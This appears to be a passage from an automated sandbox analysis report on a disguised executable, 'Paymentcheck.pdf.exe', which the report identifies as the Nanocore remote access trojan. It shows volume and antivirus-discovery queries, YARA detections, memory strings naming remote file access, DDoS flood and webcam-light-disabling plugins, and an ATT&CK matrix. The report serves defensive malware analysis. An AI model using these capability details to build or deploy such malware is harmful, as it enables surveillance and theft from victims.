Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegAsm.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegAsm.exe VolumeInformationJump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06A20DB0 GetSystemTimes,13_2_06A20DB0
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

barindex
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.394c3ad.12.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.39609da.14.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.3940179.13.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.930842679.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.933309762.0000000003811000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTR

Remote Access Functionality:

barindex
Detected Nanocore RatShow sources
Source: Paymentcheck.pdf.exe, 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegAsm.exe, 0000000D.00000002.930842679.00000000027C1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.394c3ad.12.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.39609da.14.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.3940179.13.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.930842679.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.933309762.0000000003811000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTR

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Input Capture11System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting111Scheduled Task/Job1Process Injection212Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsScheduled Task/Job1Registry Run Keys / Startup Folder11Scheduled Task/Job1Scripting111Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsPowerShell1Logon Script (Mac)Registry Run Keys / Startup Folder11Obfuscated Files or Information13NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsSecurity Software Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading12Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion21/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection212Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
